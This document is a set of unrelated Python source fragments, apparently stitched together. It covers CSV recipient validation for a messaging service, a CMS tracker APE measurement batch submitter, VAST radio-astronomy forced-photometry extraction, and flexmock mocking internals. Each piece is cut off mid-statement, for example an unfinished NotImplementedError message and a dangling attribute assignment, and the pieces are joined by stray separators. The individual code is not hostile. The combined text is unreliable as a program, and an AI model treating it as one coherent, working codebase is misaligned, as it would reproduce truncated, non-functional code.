if sms_sender_id:
reply_to = try_validate_and_format_phone_number(sms_sender_id)
else:
reply_to = template.get_reply_to_text()
elif notification_type == LETTER_TYPE:
reply_to = template.get_reply_to_text()
return reply_to
def strip_keys_from_personalisation_if_send_attach(personalisation):
return {k: v for (k, v) in personalisation.items() if not (type(v) is dict and v.get("sending_method") == "attach")}
def check_for_csv_errors(recipient_csv, max_rows, remaining_messages):
nb_rows = len(recipient_csv)
if recipient_csv.has_errors:
if recipient_csv.missing_column_headers:
raise BadRequestError(
message=f"Missing column headers: {', '.join(sorted(recipient_csv.missing_column_headers))}",
status_code=400,
)
if recipient_csv.duplicate_recipient_column_headers:
raise BadRequestError(
message=f"Duplicate column headers: {', '.join(sorted(recipient_csv.duplicate_recipient_column_headers))}",
status_code=400,
)
if recipient_csv.more_rows_than_can_send:
raise BadRequestError(
message=f"You only have {remaining_messages} remaining messages before you reach your daily limit. You've tried to send {nb_rows} messages.",
status_code=400,
)
if recipient_csv.too_many_rows:
raise BadRequestError(
message=f"Too many rows. Maximum number of rows allowed is {max_rows}",
status_code=400,
)
if not recipient_csv.allowed_to_send_to:
if api_user.key_type == KEY_TYPE_TEAM:
explanation = "because you used a team and safelist API key."
if authenticated_service.restricted:
explanation = (
"because your service is in trial mode. You can only send to members of your team and your safelist."
)
raise BadRequestError(
message=f"You cannot send to these recipients {explanation}",
status_code=400,
)
if recipient_csv.rows_with_errors:
def row_error(row):
content = []
for header in [header for header in recipient_csv.column_headers if row[header].error]:
if row[header].recipient_error:
content.append(f"`{header}`: invalid recipient")
else:
content.append(f"`{header}`: {row[header].error}")
return f"Row {row.index} - {','.join(content)}"
errors = ". ".join([row_error(row) for row in recipient_csv.initial_rows_with_errors])
raise BadRequestError(
message=f"Some rows have errors. {errors}.",
status_code=400,
)
else:
raise NotImplementedError("Got errors but code | |
from __future__ import print_function
import ConfigParser
import argparse
import pickle
import sys
import os
import subprocess
import shutil
import time
pickle_name = "dump.pkl" # contains all the measurement objects in a list
history_file = "history.log"
clock_interval = 20 # in seconds
STATE_NONE = -1
STATE_ITERATION_START=0
STATE_BJOBS_WAITING=1
STATE_BJOBS_DONE=2
STATE_BJOBS_FAILED=12
STATE_MERGE_WAITING=3
STATE_MERGE_DONE=4
STATE_MERGE_FAILED=14
STATE_SUMMARY_WAITING=5
STATE_SUMMARY_DONE=6
STATE_SUMMARY_FAILED=16
STATE_LOCAL_WAITING=7
STATE_LOCAL_DONE=8
STATE_LOCAL_FAILED=18
STATE_FINISHED=9
status_map = {}
status_map[STATE_NONE] = "STATE_NONE"
status_map[STATE_ITERATION_START] = "STATE_ITERATION_START"
status_map[STATE_BJOBS_WAITING] = "STATE_BJOBS_WAITING"
status_map[STATE_BJOBS_DONE] = "STATE_BJOBS_DONE"
status_map[STATE_BJOBS_FAILED] = "STATE_BJOBS_FAILED"
status_map[STATE_MERGE_WAITING] = "STATE_MERGE_WAITING"
status_map[STATE_MERGE_DONE] = "STATE_MERGE_DONE"
status_map[STATE_MERGE_FAILED] = "STATE_MERGE_FAILED"
status_map[STATE_SUMMARY_WAITING] = "STATE_SUMMARY_WAITING"
status_map[STATE_SUMMARY_DONE] = "STATE_SUMMARY_DONE"
status_map[STATE_SUMMARY_FAILED] = "STATE_SUMMARY_FAILED"
status_map[STATE_LOCAL_WAITING] = "STATE_LOCAL_WAITING"
status_map[STATE_LOCAL_DONE] = "STATE_LOCAL_DONE"
status_map[STATE_LOCAL_FAILED] = "STATE_LOCAL_FAILED"
status_map[STATE_FINISHED] = "STATE_FINISHED"
base = ""
def ensurePathExists(path):
import os
import errno
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def replaceAllRanges(string):
if "[" in string and "]" in string:
strings = []
posS = string.find("[")
posE = string.find("]")
nums = string[posS+1:posE].split(",")
expression = string[posS:posE+1]
nums = string[string.find("[")+1:string.find("]")]
for interval in nums.split(","):
interval = interval.strip()
if "-" in interval:
lowNum = int(interval.split("-")[0])
upNum = int(interval.split("-")[1])
for i in range(lowNum, upNum+1):
newstring = string[0:posS]+str(i)+string[posE+1:]
newstring = replaceAllRanges(newstring)
strings += newstring
else:
newstring = string[0:posS]+interval+string[posE+1:]
newstring = replaceAllRanges(newstring)
strings += newstring
return strings
else:
return [string,]
def save(measurements):
with open(pickle_name, "w") as saveFile:
pickle.dump(measurements, saveFile)
class Dataset:
name = ""
nFiles = 0
maxEvents = -1
baseDirectory = ""
sampleType = "data1"
fileList = []
conditions = []
def __init__(self, config, name):
dsDict = dict(config.items("dataset:{}".format(name)))
self.name = name
self.baseDirectory = dsDict["baseDirectory"]
self.fileList = []
names = dsDict["fileNames"].split(" ")
for name in names:
parsedNames = replaceAllRanges(name)
for fileName in parsedNames:
self.fileList.append(self.baseDirectory+"/"+fileName)
self.nFiles = len(self.fileList)
if dsDict.has_key("maxEvents"):
self.maxEvents = dsDict["maxEvents"]
if dsDict.has_key("isMC"):
if dsDict["isMC"] == "True":
self.sampleType = "MC"
else:
self.sampleType ="data1"
self.conditions = []
for key, value in dsDict.items():
if key.startswith("condition"):
record = key.split(" ")[1]
connect, tag = value.split(" ")
self.conditions.append({"record":record, "connect":connect, "tag":tag})
class Alignment:
name = ""
alignmentName = None
baselineDir = "Design"
globalTag = "None"
isDesign = False
hasAlignmentCondition = False
conditions = []
def __init__(self, config, name):
alDict = dict(config.items("alignment:{}".format(name)))
self.name = name
if alDict.has_key("alignmentName"):
self.alignmentName = alDict["alignmentName"]
if alDict.has_key("globalTag"):
self.globalTag = alDict["globalTag"]
if alDict.has_key("baselineDir"):
self.baselineDir= alDict["baselineDir"]
if alDict.has_key("isDesign"):
self.isDesign= (alDict["isDesign"] == "True")
self.hasAlignmentCondition = False # If this is true, no other Alignment-Object is loaded in apeEstimator_cfg.py using the alignmentName
self.conditions = []
for key, value in alDict.items():
if key.startswith("condition"):
record = key.split(" ")[1]
connect, tag = value.split(" ")
if record == "TrackerAlignmentRcd":
self.hasAlignmentCondition = True
self.conditions.append({"record":record, "connect":connect, "tag":tag})
# check if at least one of the two ways to define the alignment was used
if self.alignmentName == None and not self.hasAlignmentCondition:
print("Error: No alignment object name or record was defined for alignment {}".format(self.name))
sys.exit()
class ApeMeasurement:
name = "workingArea"
curIteration = 0
firstIteration = 0
maxIterations = 15
status = STATE_NONE
dataset = None
alignment = None
runningJobs = None
failedJobs = None
startTime = ""
finishTime = ""
def __init__(self, name, dataset, alignment, additionalOptions={}):
self.name = name
self.alignment = alignment
self.dataset = dataset
self.curIteration = 0
self.status = STATE_ITERATION_START
self.runningJobs = []
self.failedJobs = []
self.startTime = subprocess.check_output(["date"]).strip()
for key, value in additionalOptions.items():
setattr(self, key, value)
print(key, value)
self.firstIteration=int(self.firstIteration)
self.maxIterations=int(self.maxIterations)
self.curIteration = self.firstIteration
if self.alignment.isDesign:
self.maxIterations = 0
if self.alignment.isDesign and self.dataset.sampleType != "MC":
# For now, this won't immediately shut down the program
print("APE Measurement {} is scheduled to to an APE baseline measurement with a dataset that is not marked as isMC=True. Is this intended?".format(self.name))
ensurePathExists('{}/hists/{}'.format(base, self.name))
if not self.alignment.isDesign:
ensurePathExists('{}/hists/{}/apeObjects'.format(base, self.name))
def get_status(self):
return status_map[self.status]
def print_status(self):
print("APE Measurement {} in iteration {} is now in status {}".format(self.name, self.curIteration, self.get_status()))
def submit_jobs(self):
toSubmit = []
allConditions = self.alignment.conditions+self.dataset.conditions
allConditions = list({v['record']:v for v in allConditions}.values()) # should we clean for duplicate records? the overlap record last defined (from dataset)
# will be kept in case of overlap, which is the same as if there was no overlap removal
# If conditions are made, create file to load them from
conditionsFileName = "None"
if len(allConditions) > 0:
conditionsFileName = "{base}/python/conditions/conditions_{name}_iter{iterNo}_cff.py".format(base=base,name=self.name, iterNo=self.curIteration)
rawFileName = "conditions_{name}_iter{iterNo}_cff".format(name=self.name, iterNo=self.curIteration)
with open(conditionsFileName, "w") as fi:
from autoSubmitterTemplates import conditionsFileHeader
fi.write(conditionsFileHeader)
from autoSubmitterTemplates import conditionsTemplate
for condition in allConditions:
fi.write(conditionsTemplate.format(record=condition["record"], connect=condition["connect"], tag=condition["tag"]))
alignmentNameToUse = self.alignment.alignmentName
if self.alignment.hasAlignmentCondition:
alignmentNameToUse = "fromConditions"
lastIter = (self.curIteration==self.maxIterations) and not self.alignment.isDesign
# create a batch job file for each input file
for i in range(self.dataset.nFiles):
inputFile = self.dataset.fileList[i]
inputCommands = "sample={sample} fileNumber={fileNo} iterNumber={iterNo} lastIter={lastIter} alignRcd={alignRcd} maxEvents={maxEvents} globalTag={globalTag} measurementName={name} conditions={conditions}".format(sample=self.dataset.sampleType,fileNo=i+1,iterNo=self.curIteration,lastIter=lastIter,alignRcd=alignmentNameToUse, maxEvents=self.dataset.maxEvents, globalTag=self.alignment.globalTag, name=self.name, conditions=rawFileName)
fiName = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}_{}".format(base, self.name,self.curIteration,i+1)
with open(fiName+".tcsh", "w") as jobFile:
from autoSubmitterTemplates import bjobTemplate
jobFile.write(bjobTemplate.format(inputFile = inputFile, inputCommands=inputCommands))
toSubmit.append((fiName,i+1))
# submit all batch jobs
submitName = "{}/test/autoSubmitter/workingArea/submit_{}_jobs_iter{}.sh".format(base, self.name, self.curIteration)
with open(submitName,"w") as submitFile:
for sub,number in toSubmit:
from autoSubmitterTemplates import submitJobTemplate
errorFile = sub+"_error.txt"
outputFile = sub+"_output.txt"
jobFile = sub+".tcsh"
date = subprocess.check_output(["date", "+%m_%d_%H_%M_%S"]).strip()
jobName = sub.split("/")[-1]+"_"+date
self.runningJobs.append((jobName, number))
submitFile.write(submitJobTemplate.format(errorFile=errorFile, outputFile=outputFile, jobFile=jobFile, jobName=jobName))
submitFile.write("rm -- $0")
subOut = subprocess.check_output("bash {}".format(submitName), shell=True).strip()
if len(subOut) == 0:
print("Running on environment that does not know bsub command or ssh session is timed out (ongoing for longer than 24h?), exiting")
sys.exit()
self.status = STATE_BJOBS_WAITING
self.print_status()
def check_jobs(self):
lastStatus = self.status
stillRunningJobs = []
# check all still running jobs
for job, number in self.runningJobs:
from autoSubmitterTemplates import checkJobTemplate
checkString = checkJobTemplate.format(jobName=job)
jobState = subprocess.check_output(checkString, shell=True).rstrip()
if "DONE" in jobState:
# Catch Exceptions that do not influence the job state but make the measurement fail anyway
errFile = "{}/test/autoSubmitter/workingArea/batchscript_{}_iter{}_{}_error.txt".format(base, self.name,self.curIteration,number)
foundErr = False
with open(errFile, "r") as err:
for line in err:
if "Fatal Exception" in line.strip():
foundErr = True
break
if foundErr:
print("Job {} in iteration {} of APE measurement {} has failed".format(job, self.curIteration, self.name))
self.failedJobs.append(job)
else:
print("Job {} in iteration {} of APE measurement {} has just finished".format(job, self.curIteration, self.name))
elif "EXIT" in jobState:
print("Job {} in iteration {} of APE measurement {} has failed".format(job, self.curIteration, self.name))
self.failedJobs.append(job)
elif "RUN" in jobState or "PEND" in jobState:
stillRunningJobs.append((job, number))
elif "Job <{}> is not found".format(job) in jobState:
print("Job {} of APE measurement was not found in queue, so it is assumed that it successfully finished long ago.".format(job, self.name))
elif len(jobState) == 0:
print("Running on environment that does not know bjobs command or ssh session is timed out (ongoing for longer than 24h?), exiting")
sys.exit()
else:
print("Unknown state {}, marking job {} of APE measurement {} as failed".format(jobState, job, self.name))
self.failedJobs.append(job)
self.runningJobs = stillRunningJobs
# at least one job failed
if len(self.failedJobs) > 0:
self.status = STATE_BJOBS_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
elif len(self.runningJobs) == 0:
self.status = STATE_BJOBS_DONE
print("All batch jobs of APE measurement {} in iteration {} are done".format(self.name, self.curIteration))
if lastStatus != self.status:
self.print_status()
def do_merge(self):
self.status = STATE_MERGE_WAITING
if self.alignment.isDesign:
folderName = '{}/hists/{}/baseline'.format(base, self.name)
else:
folderName = '{}/hists/{}/iter{}'.format(base, self.name, self.curIteration)
# (re)move results from previous measurements before creating folder
if os.path.isdir(folderName):
if os.path.isdir(folderName+"_old"):
shutil.rmtree("{}_old".format(folderName))
os.rename(folderName, folderName+"_old")
os.makedirs(folderName)
# This is so that the structure of the tree can be retrieved by ApeEstimatorSummary.cc and the tree does not have to be rebuilt
if self.curIteration > 0 and not self.alignment.isDesign: # don't have to check for isDesign here because it always ends after iteration 0...
shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1),folderName+"/allData_iterationApe.root")
fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)]
fileString = " ".join(fileNames)
from autoSubmitterTemplates import mergeTemplate
merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True) # returns exit code (0 if no error occured)
for name in fileNames:
os.remove(name)
if os.path.isfile("{}/allData.root".format(folderName)) and merge_result == 0: # maybe check with ROOT if all neccessary contents are in?
self.status = STATE_MERGE_DONE
else:
self.status = STATE_MERGE_FAILED
self.finishTime = subprocess.check_output(["date"]).strip()
self.print_status()
def do_summary(self):
self.status = STATE_SUMMARY_WAITING
from autoSubmitterTemplates import summaryTemplate
if self.alignment.isDesign:
#use measurement name as baseline folder name in this case
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name)
else:
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir)
summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if summary_result == 0:
self.status = STATE_SUMMARY_DONE
else:
self.status = STATE_SUMMARY_FAILED
self.finishTime | |
import os
import logging
import datetime
import numpy as np
import pandas as pd
import dask.dataframe as dd
import dask.bag as db
from psutil import cpu_count
from glob import glob
from astropy import units as u
from astropy.coordinates import SkyCoord
from django.conf import settings
from django.db import transaction
from pyarrow.parquet import read_schema
from typing import List, Tuple, Dict
from vast_pipeline.models import Image, Measurement, Run
from vast_pipeline.pipeline.loading import make_upload_measurements
from forced_phot import ForcedPhot
from ..utils.utils import StopWatch
logger = logging.getLogger(__name__)
def remove_forced_meas(run_path: str) -> None:
'''
Remove forced measurements from the database if forced parquet files
are found.
Args:
run_path:
The run path of the pipeline run.
Returns:
None
'''
path_glob = glob(
os.path.join(run_path, 'forced_measurements_*.parquet')
)
if path_glob:
ids = (
dd.read_parquet(path_glob, columns='id')
.values
.compute()
.tolist()
)
obj_to_delete = Measurement.objects.filter(id__in=ids)
del ids
if obj_to_delete.exists():
with transaction.atomic():
n_del, detail_del = obj_to_delete.delete()
logger.info(
('Deleting all previous forced measurement and association'
' objects for this run. Total objects deleted: %i'),
n_del,
)
logger.debug('(type, #deleted): %s', detail_del)
def get_data_from_parquet(
file: str, p_run_path: str, add_mode: bool = False,) -> Dict:
'''
Get the prefix, max id and image id from the measurements parquets
Args:
file:
a string with the path of the measurements parquet file
p_run_path:
Pipeline run path to get forced parquet in case of add mode.
add_mode:
Whether image add mode is being used where the forced parquet
needs to be used instead.
Returns:
Dictionary with prefix string, an interger max_id and a string with the
id of the image
'''
if add_mode:
image_name = file.split("/")[-2]
forced_parquet = os.path.join(
p_run_path,
f"forced_measurements_{image_name}.parquet"
)
if os.path.isfile(forced_parquet):
file = forced_parquet
# get max component id from parquet file
df = pd.read_parquet(file, columns=['island_id', 'image_id'])
prefix = df['island_id'].iloc[0].rsplit('_', maxsplit=1)[0] + '_'
max_id = (
df['island_id'].str.rsplit('_', n=1)
.str.get(-1)
.astype(int)
.values.max() + 1
)
return {'prefix': prefix, 'max_id': max_id, 'id': df['image_id'].iloc[0]}
def extract_from_image(
df: pd.DataFrame, image: str, background: str, noise: str,
edge_buffer: float, cluster_threshold: float, allow_nan: bool
) -> Dict:
"""
Extract the flux, its erros and chi squared data from the image
files (image FIT, background and noise files) and return a dictionary
with the dataframe and image name
Args:
df:
input dataframe with columns [source_tmp_id, wavg_ra, wavg_dec,
image_name, flux_peak]
image:
a string with the path of the image FIT file
background:
a string with the path of the image background file
noise:
a string with the path of the image noise file
edge_buffer:
flag to pass to ForcedPhot.measure method
cluster_threshold:
flag to pass to ForcedPhot.measure method
allow_nan:
flag to pass to ForcedPhot.measure method
Returns:
Dictionary with input dataframe with added columns (flux_int,
flux_int_err, chi_squared_fit) and image name.
"""
# create the skycoord obj to pass to the forced extraction
# see usage https://github.com/dlakaplan/forced_phot
P_islands = SkyCoord(
df['wavg_ra'].values,
df['wavg_dec'].values,
unit=(u.deg, u.deg)
)
FP = ForcedPhot(image, background, noise)
flux, flux_err, chisq, DOF, cluster_id = FP.measure(
P_islands,
cluster_threshold=cluster_threshold,
allow_nan=allow_nan,
edge_buffer=edge_buffer
)
df['flux_int'] = flux * 1.e3
df['flux_int_err'] = flux_err * 1.e3
df['chi_squared_fit'] = chisq
return {'df': df, 'image': df['image_name'].iloc[0]}
def finalise_forced_dfs(
df: pd.DataFrame, prefix: str, max_id: int, beam_bmaj: float,
beam_bmin: float, beam_bpa: float, id: int, datetime: datetime.datetime,
image: str
) -> pd.DataFrame:
"""
Compute populate leftover columns for the dataframe with forced
photometry data given the input parameters
Args:
df:
input dataframe with columns [source_tmp_id, wavg_ra, wavg_dec,
image_name, flux_peak, flux_int, flux_int_err, chi_squared_fit]
prefix:
string to use to generate the 'island_id' column
max_id:
integer to use to generate the 'island_id' column
beam_bmaj:
image beam major axis
beam_bmin:
image beam minor axis
beam_bpa:
image beam position angle
id:
image id in database
datetime:
timestamp of the image file (from header)
image:
string with the image name
Returns:
Input dataframe with added columns island_id, component_id,
name, bmaj, bmin, pa, image_id, time.
"""
# make up the measurements name from the image island_id and component_id
df['island_id'] = np.char.add(
prefix,
np.arange(max_id, max_id + df.shape[0]).astype(str)
)
df['component_id'] = df['island_id'].str.replace(
'island', 'component'
) + 'a'
img_prefix = image.split('.')[0] + '_'
df['name'] = img_prefix + df['component_id']
# assign all the other columns
# convert fluxes to mJy
# store source bmaj and bmin in arcsec
df['bmaj'] = beam_bmaj * 3600.
df['bmin'] = beam_bmin * 3600.
df['pa'] = beam_bpa
# add image id and time
df['image_id'] = id
df['time'] = datetime
return df
def parallel_extraction(
df: pd.DataFrame, df_images: pd.DataFrame, df_sources: pd.DataFrame,
min_sigma: float, edge_buffer: float, cluster_threshold: float,
allow_nan: bool, add_mode: bool, p_run_path: str
) -> pd.DataFrame:
"""
Parallelize forced extraction with Dask
Args:
df:
dataframe with columns 'wavg_ra', 'wavg_dec', 'img_diff',
'detection'
df_images:
dataframe with the images data and columns 'id',
'measurements_path', 'path', 'noise_path', 'beam_bmaj',
'beam_bmin', 'beam_bpa', 'background_path', 'rms_min', 'datetime',
'skyreg__centre_ra', 'skyreg__centre_dec', 'skyreg__xtr_radius'
and 'name' as the index.
df_sources:
dataframe derived from the measurement data with columns 'source',
'image', 'flux_peak'.
min_sigma:
minimum sigma value to drop forced extracted measurements.
edge_buffer:
flag to pass to ForcedPhot.measure method.
cluster_threshold:
flag to pass to ForcedPhot.measure method.
allow_nan:
flag to pass to ForcedPhot.measure method.
add_mode:
True when the pipeline is running in add image mode.
p_run_path:
The system path of the pipeline run output.
Returns:
Dataframe with forced extracted measurements data, columns are
'source_tmp_id', 'ra', 'dec', 'image', 'flux_peak', 'island_id',
'component_id', 'name', 'flux_int', 'flux_int_err'
"""
# explode the lists in 'img_diff' column (this will make a copy of the df)
out = (
df.rename(columns={'img_diff':'image', 'source':'source_tmp_id'})
# merge the rms_min column from df_images
.merge(
df_images[['rms_min']],
left_on='image',
right_on='name',
how='left'
)
.rename(columns={'rms_min': 'image_rms_min'})
# merge the measurements columns 'source', 'image', 'flux_peak'
.merge(
df_sources,
left_on=['source_tmp_id', 'detection'],
right_on=['source', 'image'],
how='left'
)
.drop(columns=['image_y', 'source'])
.rename(columns={'image_x': 'image'})
)
# drop the source for which we would have no hope of detecting
predrop_shape = out.shape[0]
out['max_snr'] = out['flux_peak'].values / out['image_rms_min'].values
out = out[out['max_snr'] > min_sigma].reset_index(drop=True)
logger.debug("Min forced sigma dropped %i sources",
predrop_shape - out.shape[0]
)
# drop some columns that are no longer needed and the df should look like
# out
# | | source_tmp_id | wavg_ra | wavg_dec | image_name | flux_peak |
# |--:|--------------:|--------:|---------:|:-----------------|----------:|
# | 0 | 81 | 317.607 | -8.66952 | VAST_2118-06A... | 11.555 |
# | 1 | 894 | 323.803 | -2.6899 | VAST_2118-06A... | 2.178 |
# | 2 | 1076 | 316.147 | -3.11408 | VAST_2118-06A... | 6.815 |
# | 3 | 1353 | 322.094 | -4.44977 | VAST_2118-06A... | 1.879 |
# | 4 | 1387 | 321.734 | -6.82934 | VAST_2118-06A... | 1.61 |
out = (
out.drop(['max_snr', 'image_rms_min', 'detection'], axis=1)
.rename(columns={'image': 'image_name'})
)
# get the unique images to extract from
unique_images_to_extract = out['image_name'].unique().tolist()
# create a list of dictionaries with image file paths and dataframes
# with data related to each images
image_data_func = lambda x: {
'image': df_images.at[x, 'path'],
'background': df_images.at[x, 'background_path'],
'noise': df_images.at[x, 'noise_path'],
'df': out[out['image_name'] == x]
}
list_to_map = list(map(image_data_func, unique_images_to_extract))
# create a list of all the measurements parquet files to extract data from,
# such as prefix and max_id
list_meas_parquets = list(map(
lambda el: df_images.at[el, 'measurements_path'],
unique_images_to_extract
))
del out, unique_images_to_extract, image_data_func
# get a map of the columns that have a fixed value
mapping = (
db.from_sequence(
list_meas_parquets,
npartitions=len(list_meas_parquets)
)
.map(get_data_from_parquet, p_run_path, add_mode)
.compute()
)
mapping = pd.DataFrame(mapping)
# remove not used columns from images_df and merge into mapping
col_to_drop = list(filter(
lambda x: ('path' in x) or ('skyreg' in x),
df_images.columns.values.tolist()
))
mapping = (
mapping.merge(
df_images.drop(col_to_drop, axis=1).reset_index(),
on='id',
how='left'
)
.drop('rms_min', axis=1)
.set_index('name')
)
del col_to_drop
n_cpu = cpu_count() - 1
bags = db.from_sequence(list_to_map, npartitions=len(list_to_map))
forced_dfs = (
bags.map(lambda x: extract_from_image(
edge_buffer=edge_buffer,
cluster_threshold=cluster_threshold,
allow_nan=allow_nan,
**x
))
.compute()
)
del bags
# create intermediates dfs combining the mapping data and the forced
# extracted data from the images
intermediate_df = list(map(
lambda x: {**(mapping.loc[x['image'], :].to_dict()), **x},
forced_dfs
))
# compute the rest of the columns
intermediate_df = (
db.from_sequence(intermediate_df)
.map(lambda x: finalise_forced_dfs(**x))
.compute()
)
df_out = (
pd.concat(intermediate_df, axis=0, sort=False)
.rename(
columns={
'wavg_ra':'ra', 'wavg_dec':'dec', 'image_name': 'image'
}
)
)
return df_out
def write_group_to_parquet(
df: pd.DataFrame, fname: str, add_mode: bool) -> None:
'''
Write a dataframe correpondent to a single group/image
to a parquet file.
Args:
df:
Dataframe | |
{expected.__name__}:\n"
f" Expected message:\n\t'{message}'\n"
f" Received message:\n\t'{expected_message}'"
)
)
elif expected is not raised:
raise ExceptionClassError(
f"Raised exception for call {expectation._name} "
f"did not match expectation:\n"
f" Expected:\t{repr(expected)}\n"
f" Raised:\t{raised}\n\n"
"Did you try to call and_raise with an instance?\n"
'Instead of and_raise(Exception("arg")), try and_raise(Exception, "arg")'
)
else:
raise
def match_return_values(expected: Any, received: Any) -> bool:
if not isinstance(expected, tuple):
expected = (expected,)
if not isinstance(received, tuple):
received = (received,)
if len(received) != len(expected):
return False
for i, val in enumerate(received):
if not _arguments_match(val, expected[i]):
return False
return True
def pass_thru(
expectation: Expectation, runtime_self: Any, *kargs: Any, **kwargs: Any
) -> Any:
return_values = None
try:
original = _getattr(expectation, "_original")
_mock = _getattr(expectation, "_mock")
if inspect.isclass(_mock):
if expectation._method_type in SPECIAL_METHODS:
original = _getattr(expectation, "_original_function")
return_values = original(*kargs, **kwargs)
else:
return_values = original(runtime_self, *kargs, **kwargs)
else:
return_values = original(*kargs, **kwargs)
except Exception:
return _handle_exception_matching(expectation)
expected_values = _getattr(expectation, "_return_values")
if expected_values and not match_return_values(expected_values[0].value, return_values):
expected_value = expected_values[0].value
# Display strings with quotes in the error message
if isinstance(return_values, str):
return_values = repr(return_values)
if isinstance(expected_value, str):
expected_value = repr(expected_value)
raise (
MethodSignatureError(
f"Returned values for call {expectation._name} did not match expectation:\n"
f" Expected:\t{expected_value}\n"
f" Returned:\t{return_values}"
)
)
return return_values
def _handle_matched_expectation(
expectation: Expectation, runtime_self: Any, *kargs: Any, **kwargs: Any
) -> Any:
if not expectation._runnable():
raise StateError(
f"{name} expected to be called when {expectation._get_runnable()} is True"
)
expectation._times_called += 1
expectation._verify(final=False)
_pass_thru = _getattr(expectation, "_pass_thru")
_replace_with = _getattr(expectation, "_replace_with")
if _pass_thru:
return pass_thru(expectation, runtime_self, *kargs, **kwargs)
if _replace_with:
return _replace_with(*kargs, **kwargs)
return_values = _getattr(expectation, "_return_values")
if return_values:
return_value = return_values[0]
del return_values[0]
return_values.append(return_value)
else:
return_value = ReturnValue()
if return_value.raises:
if inspect.isclass(return_value.raises):
raise return_value.raises(
*return_value.value["kargs"], **return_value.value["kwargs"]
)
raise return_value.raises # pylint: disable=raising-bad-type
return return_value.value
def mock_method(runtime_self: Any, *kargs: Any, **kwargs: Any) -> Any:
arguments = {"kargs": kargs, "kwargs": kwargs}
expectation = FlexmockContainer.get_flexmock_expectation(self, name, arguments)
if expectation:
return _handle_matched_expectation(expectation, runtime_self, *kargs, **kwargs)
# inform the user which expectation(s) for the method were _not_ matched
saved_expectations = reversed(FlexmockContainer.get_expectations_with_name(self, name))
error_msg = (
f"Arguments for call {name} did not match expectations:\n"
f" Received call:\t{_format_args(name, arguments)}\n"
)
if saved_expectations:
error_msg += "\n".join(
f" Expected call[{index}]:\t{_format_args(name, expectation._args)}"
for index, expectation in enumerate(saved_expectations, 1)
)
raise MethodSignatureError(error_msg)
return mock_method
def flexmock_teardown() -> None:
"""Performs flexmock-specific teardown tasks."""
saved = {}
instances = []
classes = []
for mock_object, expectations in FlexmockContainer.flexmock_objects.items():
saved[mock_object] = expectations[:]
for expectation in expectations:
_getattr(expectation, "_reset")()
for expectation in expectations:
# Remove method type attributes set by flexmock. This needs to be done after
# resetting all the expectations because method type is needed in expectation teardown.
if inspect.isclass(mock_object) or hasattr(mock_object, "__class__"):
try:
delattr(mock_object._object, f"{expectation._name}__flexmock__method_type")
except (AttributeError, TypeError):
pass
for mock in saved:
obj = mock._object
if not isinstance(obj, Mock) and not inspect.isclass(obj):
instances.append(obj)
if inspect.isclass(obj):
classes.append(obj)
for obj in instances + classes:
for attr in UPDATED_ATTRS:
try:
obj_dict = obj.__dict__
if obj_dict[attr].__code__ is Mock.__dict__[attr].__code__:
del obj_dict[attr]
except Exception:
try:
if getattr(obj, attr).__code__ is Mock.__dict__[attr].__code__:
delattr(obj, attr)
except AttributeError:
pass
FlexmockContainer.teardown_properties()
FlexmockContainer.reset()
# make sure this is done last to keep exceptions here from breaking
# any of the previous steps that cleanup all the changes
for mock_object, expectations in saved.items():
for expectation in expectations:
_getattr(expectation, "_verify")()
class Expectation:
"""Holds expectations about methods.
The information contained in the Expectation object includes method name,
its argument list, return values, and any exceptions that the method might
raise.
"""
def __init__(
self,
mock: Mock,
name: Optional[str] = None,
return_value: Optional[Any] = None,
original: Optional[Any] = None,
method_type: Optional[Any] = None,
) -> None:
if original is not None:
self._original = original
self._name = name
self._times_called: int = 0
self._modifier: str = EXACTLY
self._args: Optional[Dict[str, Any]] = None
self._method_type = method_type
self._argspec: Optional[inspect.FullArgSpec] = None
self._return_values = [ReturnValue(return_value)] if return_value is not None else []
self._replace_with: Optional[Callable[..., Any]] = None
self._original_function: Optional[Callable[..., Any]] = None
self._expected_calls = {EXACTLY: None, AT_LEAST: None, AT_MOST: None}
self._runnable: Callable[..., bool] = lambda: True
self._mock = mock
self._pass_thru = False
self._ordered = False
self._one_by_one = False
self._verified = False
self._callable = True
self._local_override = False
def __str__(self) -> str:
args = _format_args(str(self._name), self._args)
return_values = ", ".join(str(x) for x in self._return_values)
return f"{args} -> ({return_values})"
def __call__(self) -> "Expectation":
return self
def __getattribute__(self, name: str) -> Any:
if name == "once":
return _getattr(self, "times")(1)
if name == "twice":
return _getattr(self, "times")(2)
if name == "never":
return _getattr(self, "times")(0)
if name in ("at_least", "at_most", "ordered", "one_by_one"):
return _getattr(self, name)()
if name == "mock":
return _getattr(self, "mock")()
return _getattr(self, name)
def __getattr__(self, name: str) -> NoReturn:
self.__raise(
AttributeError, f"'{self.__class__.__name__}' object has not attribute '{name}'"
)
def _get_runnable(self) -> str:
"""Ugly hack to get the name of when() condition from the source code."""
name = "condition"
try:
source = inspect.getsource(self._runnable)
if "when(" in source:
name = source.split("when(")[1].split(")")[0]
elif "def " in source:
name = source.split("def ")[1].split("(")[0]
except Exception:
# couldn't get the source, oh well
pass
return name
def _verify_signature_match(self, *kargs: Any, **kwargs: Any) -> None:
if isinstance(self._mock, Mock):
return # no sense in enforcing this for fake objects
allowed = self._argspec
args_len = len(allowed.args)
# self is the first expected argument
has_self = allowed.args and allowed.args[0] == "self"
# Builtin methods take `self` as the first argument but `inspect.ismethod` returns False
# so we need to check for them explicitly
is_builtin_method = isinstance(self._original, BuiltinMethodType) and has_self
# Methods take `self` if not a staticmethod
is_method = inspect.ismethod(self._original) and self._method_type is not staticmethod
# Class init takes `self`
is_class = inspect.isclass(self._original)
# When calling class methods or instance methods on a class method takes `cls`
is_class_method = (
inspect.isfunction(self._original)
and inspect.isclass(self._mock)
and self._method_type is not staticmethod
)
if is_builtin_method or is_method or is_class or is_class_method:
# Do not count `self` or `cls`.
args_len -= 1
